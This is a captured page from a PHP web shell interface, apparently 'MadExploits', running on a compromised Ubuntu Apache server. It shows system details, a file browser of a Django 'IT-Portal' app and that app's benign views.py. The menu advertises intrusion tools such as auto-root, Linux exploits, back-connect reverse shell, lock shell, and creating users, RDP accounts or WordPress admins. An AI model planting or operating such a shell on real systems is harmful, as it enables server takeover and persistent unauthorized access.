Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
IT-Portal /
home /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-x--x
migrations
[ DIR ]
drwxr-x--x
__init__.py
0
B
-rwxr-x--x
admin.py
128
B
-rwxr-x--x
apps.py
146
B
-rwxr-x--x
models.py
417
B
-rwxr-x--x
tests.py
63
B
-rwxr-x--x
urls.py
302
B
-rwxr-x--x
views.py
1.04
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views.py
from django.shortcuts import render, HttpResponse from datetime import datetime from home.models import Contact # Create your views here. def index(request): # context = { # "variable":":- This is context", # "variable1":":- This is context1" # } return render(request, 'index.html') #return render(request, 'index.html',context) #return HttpResponse("This is home page") def team(request): return render(request, 'team.html') #return HttpResponse("This is about page") def services(request): return render(request, 'services.html') #return HttpResponse("This is services page") def contact(request): if request.method == "POST": name = request.POST.get('name') email = request.POST.get('email') mobile = request.POST.get('mobile') des = request.POST.get('des') contact = Contact(name=name, email=email, mobile=mobile, des=des) contact.save() return render(request, 'contact.html') #return HttpResponse("This is contact page")
Close